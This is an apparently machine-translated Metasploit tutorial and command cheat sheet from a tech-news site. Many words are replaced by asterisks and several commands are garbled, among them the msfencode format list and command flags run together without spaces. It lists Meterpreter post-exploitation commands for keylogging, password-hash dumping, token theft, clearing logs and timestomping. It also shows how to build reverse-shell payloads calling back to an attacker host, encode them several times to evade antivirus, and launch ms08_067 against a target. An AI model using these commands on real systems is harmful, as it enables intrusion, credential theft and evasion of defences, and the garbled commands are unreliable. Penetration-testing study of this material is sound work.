Shulou(Shulou.com)06/01 Report--

Introduction to Metasploit

Metasploit is an open source security vulnerability detection tool that helps security and IT professionals identify security issues, verify vulnerability mitigation measures, and manage expert-driven security assessments to provide real security risk intelligence. These features include intelligent development, code auditing, Web application scanning, and social engineering.

Basic framework

Metasploit is a modular system, and the entire framework can be divided into the following module types:

1. Thank you * module

two。 Auxiliary module

3. Null instruction module

4. Load

5. Encoder module

6. Rear * module

An application that interfaces with a Metasploit framework, such as Armitage, can be considered a sixth type, but it is not part of the framework itself.

* module (exploit): code that uses discovered security vulnerabilities or configuration vulnerabilities to perform * on remote target systems.

(1) active * module (server *)

(2) passive * * module (client * *)

Auxiliary module (Aux): to realize information collection, password guessing, Dos***, etc., which cannot directly obtain server permissions.

Null instruction module (Nop): null instructions (NOP) are null or irrelevant operation instructions that do not have any substantial effect on the running state of the program.

The most typical null instruction is null operation, and the opcode on X86 CPU architecture platform is ox90.

When * constructing an evil data buffer, it is often necessary to add an empty instruction area before the actual Shellcode to be executed

In this way, when the jump executes ShellCode after triggering *, there is a larger safe landing area, thus avoiding memory exposure.

The failure of ShellCode execution caused by address randomization, error in return address calculation and other reasons improves the reliability of *.

Encoder module (encode): * * after the load and null instruction module assembles an instruction sequence, evil data is added to this instruction by the * module.

Before the buffer is handed over to the target system to run, the Metasploit framework needs to complete a very important process-coding.

The first mission of the coding module is to ensure that there are no "bad characters" that should be avoided during the * load.

The second mission of the encoder is to "kill-free" the * * payload, that is, to evade anti-virus software, IDS*** detection systems and

Detection and blocking of IPS*** Defense system

Rear * * module (post): used to maintain access

Plug-in:

Interfaces: msfconsole (most common), msfcli (the latest version has been cancelled), msfgui (graphical interface), etc.

Function program: msfconsole main framework can realize the whole process (information collection, * access).

Msfvenom (integrates all the functions of msfpayload and msfencode), msfpayload (the new version has been cancelled), msfencode (the new version has been cancelled)

The * load can be encapsulated in various forms (exe, PHP, Java, apk, C, Python … Very powerful)

Msf*scan (msfelfscan, msfpescan, msfbinscan, msfmachscan) provides the function of searching for specific instructions in various types of files such as PE, ELF, etc., which can help code developers locate instruction addresses.

* payload module (payload): * payload is a piece of implanted code that causes the target system to run after * success. The most common * * payloads are binding shell and reverse shell.

Bind shell

This kind of shell lurks and listens to the port waiting for the person to connect or send instructions.

Reverse shell

Reverse shell will connect back to the user for immediate instruction and interaction.

Listener

Listeners are powerful helpers of the Metasploit framework, interacting with conversations established through * * payloads. The listener can not only be embedded in a binding shell to wait for a connection, but also actively listen for a connection from the security tester's computer.

Shellcode

Shell itself is not a module, it is more like a sub-module in the available * * load embedded in the Metasploit framework.

Metasploit usage

Metasploit currently provides three user interfaces, one is GUI mode, the other is console mode, and the third is CLI (command line) mode. A WEB mode was originally provided, but it is no longer supported. At present, these three modes have their own advantages and disadvantages, so it is recommended to use them in MSF console mode. Almost all the functions provided by MSF can be used in console, and some other external commands, such as ping, can be executed in console.

Enter msfconsole to enter the metasploit command interface

Start / close the service

View metasploit service status

Service metasploit status

Restart the service

Service metasploit restart

Out of Service

Service metasploit stop

Update the database and enter commands through the terminal

Msfupdate

Download the installation immediately after an update is detected, restart the service, and then reopen it.

Detailed explanation of command

Show exploits

List all the * modules in the metasploit framework.

Show payloads

Lists all * loads in the metasploit frame.

Show auxiliary

Lists all auxiliary loads in the metasploit frame.

Search name

Find all the * and other modules in the metasploit framework.

Info

Displays information about the specified * or module.

Use name

Load a * or module.

LHOST

The IP address that you can connect to the target host locally, usually when the target host is not in the same local area network, it needs to be a public IP address, especially for rebound shell.

RHOST

The remote host or the target host.

Set function

Set specific configuration parameters (EG: set local or remote host parameters).

Setg function

Set specific configuration parameters globally (EG: set local or remote host parameters).

Show options

Lists all the configuration parameters in a * or module.

Show targets

List * all supported target platforms.

Set target num

Specify the operating system and patch version type of the target you know.

Set payload name

Specify the * load you want to use.

Show advanced

Lists all advanced configuration options.

Set autorunscript migrate-f.

After * is completed, it will be automatically migrated to another process.

Check

Check whether the target is selected * there is a corresponding security vulnerability.

Exploit

Execute * or module to * target.

Exploit-j

* (* will be carried out in the background) under the scheduled task.

Exploit-z

* do not interact with the reply after completion.

Exploit-e encoder

Develop the EG:exploit-e shikata_ga_nai to use.

Exploit-h

Lists help information for the exploit command.

Sessions-l

Lists the available interactive sessions (used when working with multiple shell).

Sessions-l-v

List all available interactive sessions and details, and which security vulnerabilities are used in the EG:*** system.

Sessions-s script

Run a specific metasploit script in all active metasploit sessions.

Sessions-K

Kill all active interactive sessions.

Sessions-c cmd

Execute a command on all active metasploit sessions.

Sessions-u sessionID

Upgrade a normal win32 shell to metasploit shell.

Db_create name

Create a database to be used by the database driver (EG:db_create autopwn).

Db_connect name

Create and connect a database to be used by the database driver (EG:db_connect user:passwd@ip/sqlname).

Db_namp

Use nmap and store the scanned data in the database (support ordinary nmap statements, EG:-sT-v-P0).

Db_autopwn-h

Shows help for the db_autopwn command.

Db_autopwn-p-r-e

Db_autopwn,*** all systems on all discovered open ports and use a bouncing shell.

Db_destroy

Delete the current database.

Db_destroy user:passwd@host:port/database

Use advanced options to delete the database.

* metasploit command * *

Help

Open meterpreter to use help.

Run scriptname

Run the meterpreter script and you can see all the script names in the scripts/meterpreter directory.

Sysinfo

Lists the system information for the controlled host.

Ls

Lists the file and folder information for the target host.

Use priv

Load the privilege escalation extension module to extend the metasploit library.

Ps

Displays all running processes and associated user accounts.

Migrate PID

Migrate to a specified process ID (the PID number can be obtained from the host through the ps command).

Use incognito

Load the incognito function (used to steal tokens from the target host or fake users)

List_tokens-u

Lists the available tokens of the target host user.

List_tokens-g

Lists the available tokens for the target host user group.

Impersonate_token DOMAIN_NAME\\ USERNAME

Impersonate an available token on the target host.

Steal_token PID

Steal the available tokens for a given process and counterfeit them.

Drop_token

Stop passing off the current token.

Getsystem

Enhance the user rights of the system through various * vectors.

Execute-f cmd.exe-I

Execute cmd.exe commands and interact.

Execute-f cmd.exe-I-t

Execute the cmd command with all available tokens and hide the process.

Rev2self

Go back to the initial user account that controls the target host.

Reg command

Interact, create, delete, query and other operations in the target host registry.

Setdesktop number

Switch to another user interface (this feature is based on those users who are logged in).

Screenshot

Take a screenshot of the target host.

Upload file

Upload files to the target host.

Download file

Download the file from the target host.

Keyscan_start

Turn on the keylogger for the remote destination host.

Keyscan_dump

Stores keyboard records captured on the target host.

Keyscan_stop

Stop keylogging for the target host.

Getprivs

Get as many privileges as possible on the target host.

Uictl enable keyboard/mouse

Take over the keyboard and mouse of the target host.

Background

Transfer your current metasploit shell to background execution.

Hashdump

Export the password hash value in the target host.

Use sniffer

Load sniffing mode.

Sniffer_interfaces

Lists all open network ports of the target host.

Sniffer_dump interfaceID pcapname

Start sniffing on the target host.

Sniffer_start interfaceID packet-buffer

Start sniffing on the target host for a specific range of packet buffers.

Sniffer_stats interfaceID

Gets statistics that sniffing network interfaces are being implemented.

Sniffer_stop interfaceID

Stop sniffing.

Add_user username password-h ip

Add a user on the remote destination host.

Clearev

Be aware of the logging on the target host.

Timestomp

Modify file properties, such as when the file was created (anti-forensic investigation).

Reboot

Restart the target host.

* MSFpayload command * *

Msfpayload-h

Help information for msfpayload.

Msfpayload windows/meterpreter/bind_tcp O

Lists the configuration items for all available * loads under windows/meterpreter/bind_tcp (any * loads are available).

Msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT X > payload.exe

Create a reverse_tcp*** payload for metasploit, connect it back to LHOSTip's LPORT, and save it as an executable program under windows named payload.exe.

Msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > payload.raw

Create a reverse_tcp*** payload for metasploit, connect back to LHOSTip's LPORT, and save it as payload.raw, which is used in msffencode at the end of the file.

Msfpayload windows/meterpreter/reverse_tcp LPORT=PORT C > payload.c

Create a reverse_tcp*** payload for metasploit and export the shellcode in C format.

Msfpayload windows/meterpreter/reverse_tcp LPORT=PORT J > payload.java

Create a reverse_tcp*** payload for metasploit and export it as a java script language string encoded in% u.

* msfencode command * *

Mefencode-h

Lists the help commands for msfencode.

Msfencode-l

List all available encoders.

Msfencode-t (c _ rec _ ELF _ pr _ exePart _ java _ journal _ beg _ retro _ Perl _ r _ w _ r _ b _ r _ r

Displays the format of the encoding buffer.

Msfencode-I payload.raw-o encoded_payload.exe-e x86/shikata_ga_nai-c 5-t exe

Use the shikata_ga_nai encoder to encode the payload.raw file 5, and then export a file named encoded_payload.exe.

Msfpayload windows/meterpreter/bind_tcp LPORT=PORT R | msfencode-e x86/_countdown-c 5-t raw | msfencode-e x86/shikata_ga_nai-c 5-t exe-o multi-encoded_payload.exe

Create a * payload that is nested in multiple encoding formats.

Msfencode-I payload.raw BufferRegister=ESI-e x86/alpja_mixed-t c

Create a pure alphanumeric shellcode, output in C language format from the ESI register only shellcode.

* MSFcli command * *

Msfcli | grep exploit

Only * modules are listed.

Msfcli | grep exploit/windows

Only the * modules related to windows are listed.

Msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E

The IP initiating ms08_067_netapi*, is configured with the bind_tcp*** payload and bound to the PORT port for listening.

That's basically it. If you want to know more about practical tutorials

Please see the next decomposition.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.